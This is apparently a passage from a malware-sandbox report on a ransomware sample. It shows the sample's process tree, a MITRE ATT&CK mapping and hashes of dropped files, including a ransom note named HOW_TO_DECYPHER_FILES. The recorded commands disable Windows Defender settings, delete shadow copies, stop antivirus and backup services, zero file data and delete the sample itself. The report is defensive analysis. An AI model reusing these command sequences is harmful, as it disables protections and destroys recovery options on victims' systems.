  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4776
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:3928
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2572
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3596
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:796
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5112
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:792
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1908
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3680
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3388
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2524
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2372
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2932
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3792
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3624
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2536
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5068
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:3484
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:4676
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:3640
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:1012
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:1548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:6632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:6400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:3620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:6852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:2580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:6744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4284
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:6420
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:6552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:6892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:4604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:6736
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:6828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:4788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6648
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:1524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6568
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:4212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:6480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:2668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:6788
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:6456
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:1408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:6488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:1484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:6448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:2312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:6624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:6616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:6820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:6464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:6560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:4148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:6412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:6428
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:6640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:6440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:2180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:6608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:6884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:6576
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:6752
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:6660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:560
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:5272
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:6060
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:6332
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5740
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
  2⤵
  PID:5336
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:7084

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6576

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\fb74db93748046b4857c2dd9b94a4534 /t 6252 /p 5272
1⤵
PID:2524

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3992

C:\Windows\System32\SystemSettingsBroker.exe
C:\Windows\System32\SystemSettingsBroker.exe -Embedding
1⤵
PID:5828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s RmSvc
1⤵
PID:7032

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:7056
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:5264
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.0.588753837\866359806" -parentBuildID 20221007134813 -prefsHandle 1716 -prefMapHandle 1708 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48990510-dd44-485f-b8f0-0fdbbafb25b2} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 1796 1abffe06458 gpu
    3⤵
    PID:3980
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.1.1633732140\70754201" -parentBuildID 20221007134813 -prefsHandle 2124 -prefMapHandle 2120 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {feca39cc-ecad-4c57-a713-233e33ac1d92} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 2152 1abff3fd058 socket
    3⤵
    PID:4440
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.2.1175030070\1631846027" -childID 1 -isForBrowser -prefsHandle 3040 -prefMapHandle 3036 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {251dbc4f-69f2-4ef1-b8e0-4109f7380b6f} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 3052 1abff45b858 tab
    3⤵
    PID:6412
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.3.2070104747\1435855234" -childID 2 -isForBrowser -prefsHandle 3468 -prefMapHandle 3464 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {983eae45-a8c1-485a-ab64-8acb273d356e} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 3480 1ab8b596e58 tab
    3⤵
    PID:5108
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.4.1196788143\52312921" -childID 3 -isForBrowser -prefsHandle 3968 -prefMapHandle 3964 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ae0b952-f8e7-4d5f-8d3e-ff8c45350cbe} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 3980 1ab8bf53158 tab
    3⤵
    PID:4692
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.7.106175146\1315165128" -childID 6 -isForBrowser -prefsHandle 5172 -prefMapHandle 5176 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {132b0063-ff9f-43ae-acfc-24fe650881b5} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 5164 1ab8d6d7558 tab
    3⤵
    PID:5176
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.6.482119680\636777080" -childID 5 -isForBrowser -prefsHandle 4976 -prefMapHandle 4980 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {143ea3ff-f4ed-4ad2-ab22-0939cf1a1d32} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 4968 1abff4bee58 tab
    3⤵
    PID:3928
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.5.1587135705\285574710" -childID 4 -isForBrowser -prefsHandle 4824 -prefMapHandle 4820 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {99151f20-93da-4e53-b8aa-74d979fcb956} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 4836 1abfbe5f558 tab
    3⤵
    PID:5516
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.8.1629871287\898279998" -childID 7 -isForBrowser -prefsHandle 5596 -prefMapHandle 5636 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e981d2b6-1fac-43d7-ba4d-5e10004937d2} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 5624 1ab8f21dd58 tab
    3⤵
    PID:6036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\HOW_TO_DECYPHER_FILES.txt

Filesize
446B

MD5
5ec70c63f923df3d7138b320b148bc8b

SHA1
657a2e7b2733b9086d6f727a8b0a29551d66f49b

SHA256
014cf5109357d670105e4cb1a782168fbfaa778e62342d32b545a60286db33dc

SHA512
249552eb21e52562bb8516a68a29eb05e5db752e6acabe91c045c4395cf3c6661c2f23e8caffad0284be71439e2a0b83d11c3b8a7a6b895122c50deea3844267

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dcdb2107d1c46a960e5d69c723519b65

SHA1
e49c18e3720629173e103c5749d328c6a9038b43

SHA256
2b40dd02b90e4b9051c3b0c6fc7a5c2e3d3d1a86eb70fe9557544ed1be6f47e9

SHA512
da60223e5a0a96f6e69b17a55eccab4ad8304d72b87a5616ce819226e7f5027cc30e62170287ab71d248f70779c72efe805f551deadb91d3a51231afd170aac5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
296db004842caa6cb926635ce70ad244

SHA1
4092bdb91456ea49cc17021dbd27531fd6d84f62

SHA256
86b9a02feaf35e40d4b34815bffd6754a71306773167cd0c3d56d36b3b46d9b4

SHA512
8ae781cb761a71ef1f29e5410cb0cbbf832a6379b4eae6f5684b058c747324e551e5b3ade23d016a3aa2d20ae7019db5b1eecb073326acd3f4d6cc22df9a9164

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8a1aa439f8f2cb07e181a4914859213

SHA1
9723021287ab8cccb2062a10c2f56ae340ae99f3

SHA256
a0df26180411ebc7aebc1ea2ec044f71b8f34644b42ff3db2929633383c7c87e

SHA512
4898edab373285a641241144b4d3f72bd3361ad3becc7f0fcc8652e2c301bf0f882a093c89db4c0f82dd5a73dc3ec25bd0df3ef13c254e3a34723d4fe5cd3035

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
98f6ad48086a4049fb5b7dcc4db83d46

SHA1
997cf86ac407623a0bc5586088500f90bfb3c8be

SHA256
04c52a46f8ca2aec554262f16dae9ae0d5d9bfe98a50cab71bbb44d6e4e856a0

SHA512
58647c7c2b5c3b7a4bf7360f231c1248351d1f881f74f33d39c214d1da5d27c7eef66458976695c9db35e48f2fbfa95e33db645934fadb5cfdbe9bc25e549234

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4369c9914b0a76900e5b017c5bb78e48

SHA1
9dbacd105b3adcfd52cfa805dd94b3ddef702773

SHA256
ac2a23086677c45f31b3a3d2a0e0b6feb2853edd8f1c2dcef4757047ff3ba1a4

SHA512
3682d05005310d5fd9b4a3b82c93f7ff4a7e3d4ca56a7d3ae88a3343cbfe0034ffa1c3b128efdc7fb360f3bb82991f9ad3da6d994058a8cc8bd16fe23c7e328e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ed2215784ae7fe57be75213e07b67191

SHA1
0edaf02636b993c8f93afe821013537e59489350

SHA256
bf4127beabb53610bc46f3e702675651fbc25994076cf77a27429233fafc6086

SHA512
25427e13b04ac1e14bd962276202503be8ae0fc9e7dc025006d84b65ec36177a1040195596feb6410025d6aa510d71f36a465b043a029121e58f5e09ab7a09aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
50be382e5e3d1e6c9d28d026c2d22a00

SHA1
55029a5da5196c017d0d2f5c84af5c5b8dbc9044

SHA256
bc4a26ed0022360d70d4c453c7f33aceaaba3df14bafa20f5b50ee42172dd7fc

SHA512
996730b74e0dca1e5f2a5dca6c615fc64b0de6660d361b548ac7161a63ce78e2f4e3e3a2f1bf591865dabd9e9dd8b0c876d677e80091d9e0ceadb324422fec59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4ba8c095dbf30fc4069af5bf36b60578

SHA1
01e01c2a73acc4e5963a5f7ded36224ea9074f69

SHA256
76f40008c72222ff3c734528ee15e09da3c66e236cd88214b49fbdca1c46e6ea

SHA512
ddd3fc3892ac0a1bd2297d89210bf008912769e45f43c87fab23f3ab918f9745ee0376873d9789ccf40b75038e4f2c7fecc2bb6ac8fca0b1338abe112c49f1df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
176b49b2c9b018cf4e280820e9fb257d

SHA1
0c5506c5e30d4161e8308d49280c50c9f93ecbd0

SHA256
4d92432af5b1f61ae55d6a1a7f1b48e4b67bcedfbcd9bf6899031a9028926966

SHA512
159c1b5663941d7b206fdfa344a14d7236c133c27aef6a1a47be5692619704835306f1a71b142a10c096e10a96f8953b019323028ef1448c1e955a28a34b725c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d122f6fcd37703f166c3dccdf9a749b1

SHA1
e581b2171dcd70e879c643db9894d1ce7cbe41cb

SHA256
272bcdd6c5b62dce7bc03b735ea1d106738c27f3690a8b520b572cb011218b7e

SHA512
61f2a0cc6cef40de2d86daae97e998648b6393524952d81339415a9f04e1248ba86692e2b2b494b4a704e5eccde1c0a8d5858a7e9043683dccf39510d0e997cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oluahwxx.ger.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
8.0MB

MD5
a01c5ecd6108350ae23d2cddf0e77c17

SHA1
c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

SHA256
345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

SHA512
b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\datareporting\glean\db\data.safe.bin

Filesize
9KB

MD5
548635e61302f2cee7c6493a70b97bd2

SHA1
e92dd65b16cf55528ed952072d0827e16426a816

SHA256
390c33ea484334323720a48249bb9aec7a4b9fadd577665ddcb0b81552f0a3bc

SHA512
